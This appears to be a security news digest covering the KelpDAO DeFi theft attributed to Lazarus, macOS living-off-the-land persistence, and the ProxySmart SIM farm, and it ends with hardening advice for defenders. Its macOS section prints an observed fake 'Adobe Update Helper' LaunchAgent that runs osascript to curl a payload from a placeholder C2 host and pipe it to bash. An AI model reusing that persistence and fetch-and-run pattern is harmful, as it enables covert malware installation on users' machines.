The latest ThreatsDay Bulletin from The Hacker News rounds up 28 security stories from the past week, with three major themes dominating the threat landscape: a $290 million DeFi heist attributed to North Korea's Lazarus Group, newly documented macOS living-off-the-land (LotL) attack techniques, and the exposure of ProxySmart SIM farm infrastructure used for SMS fraud and account takeover operations.
Lead Story: $290M KelpDAO Hack — Lazarus Strikes Again
The KelpDAO decentralized finance platform was drained of approximately $290 million in a sophisticated attack that security researchers at multiple firms have attributed to Lazarus Group, the North Korean state-sponsored threat actor responsible for some of the largest cryptocurrency heists in history.
The attack targeted KelpDAO's cross-chain bridge infrastructure, exploiting a combination of smart contract vulnerabilities and compromised private keys. Blockchain analytics firms tracking the fund movement identified the attacker's wallets using patterns consistent with Lazarus Group's historical laundering operations, including the use of Tornado Cash alternatives and cross-chain mixing services.
| Detail | Value |
|---|---|
| Target | KelpDAO (DeFi protocol) |
| Amount Stolen | ~$290 million |
| Attack Vector | Cross-chain bridge exploit |
| Attribution | Lazarus Group (DPRK) |
| Fund Status | Active laundering via mixers |
This attack follows a pattern established across Bybit ($1.5B), Drift ($280M), and multiple smaller DeFi protocols — reinforcing that North Korea has industrialized cryptocurrency theft as a primary funding mechanism for weapons programs, generating billions annually through cyber operations.
macOS Living-Off-the-Land Abuse Techniques
Security researchers documented new macOS-specific LotL techniques in active use by threat actors to maintain persistence and evade endpoint detection:
Abused Built-in macOS Components
launchd and LaunchAgents: Attackers are registering malicious LaunchAgent property list files in ~/Library/LaunchAgents/ disguised as system or application update services. These survive reboots and execute with user-level privileges without triggering macOS security alerts.
osascript and AppleScript: JavaScript for Automation (JXA) scripts are being executed via osascript to perform credential harvesting, keychain access, and file exfiltration — all using Apple's own scripting runtime with no unsigned binary warnings.
curl and python3: Payload delivery via the macOS built-in curl and system Python 3 interpreter bypasses application allowlisting controls since these are signed Apple binaries.
# Example LotL persistence pattern observed in the wild:
# Malicious LaunchAgent registered as fake "Adobe Update Helper"
~/Library/LaunchAgents/com.adobe.updatehelper.plist
# Executes: /usr/bin/osascript -e 'do shell script "curl -s http://[C2]/payload | bash"'Why LotL is Effective on macOS:
- macOS Gatekeeper and notarization checks only apply to new downloads, not system binaries
- EDR products struggle to flag malicious use of legitimate Apple binaries without behavioral baselines
- Many macOS security tools focus on signature-based detection, which LotL explicitly evades
ProxySmart SIM Farm Infrastructure Exposed
A detailed analysis of ProxySmart, a criminal SIM farm operation, revealed the infrastructure powering large-scale SMS phishing (smishing), account takeover attacks, and SMS-based 2FA bypass operations.
SIM farms operate by housing hundreds to thousands of physical SIM cards in automated rack hardware, allowing operators to:
- Register fake accounts at scale across platforms requiring phone verification
- Receive SMS 2FA codes on demand to bypass authentication on compromised accounts
- Conduct smishing campaigns from legitimate phone numbers that bypass carrier spam filters
- Sell SMS verification as a service to other criminal operators
The ProxySmart infrastructure analysis revealed operations spanning multiple countries, with SIM cards from dozens of carriers enabling attackers to evade country-specific fraud detection systems. The service was marketed on criminal forums as an "anti-detection" solution for account creation and verification bypass.
Additional Stories in This Week's Bulletin
The full ThreatsDay Bulletin also covers:
Ransomware and Extortion:
- New ransomware variants using virtualization evasion
- Double-extortion groups expanding data leak operations
- Healthcare sector remaining the top ransomware target in Q1 2026
Vulnerability and Exploitation:
- Multiple zero-days in enterprise software under active exploitation
- Supply chain attacks targeting developer toolchains
- Browser extension abuse for credential harvesting
Nation-State Activity:
- Multiple APT groups expanding targeting to critical infrastructure
- State-sponsored actors increasing use of commercial spyware
- Election-related disinformation campaigns tied to state actors
Threat Intelligence:
- New infostealer families targeting cryptocurrency wallets
- Phishing kits adopting AI-generated lure content
- Dark web marketplace activity for stolen enterprise credentials
What Security Teams Should Prioritize This Week
Based on the bulletin's findings, the highest-priority actions for security teams are:
1. DeFi and Cryptocurrency Security:
- Audit all smart contract bridge implementations for privileged function access controls
- Implement multi-signature requirements for large fund movements
- Monitor for wallet address patterns associated with Lazarus Group laundering
2. macOS Endpoint Hardening:
- Deploy behavioral EDR capable of detecting LotL abuse by Apple binaries
- Audit LaunchAgent and LaunchDaemon directories for unauthorized persistence entries
- Restrict osascript execution to administrative workflows only
3. SMS/Phone-Based Authentication:
- Migrate critical accounts from SMS 2FA to hardware security keys or authenticator apps
- Monitor for bulk account registration patterns from shared phone number pools
- Implement SIM swap detection alerts with mobile carriers for high-value accounts
4. Supply Chain Vigilance:
- Review all npm, PyPI, and other package registry dependencies for recent unexpected version updates
- Implement package integrity verification in CI/CD pipelines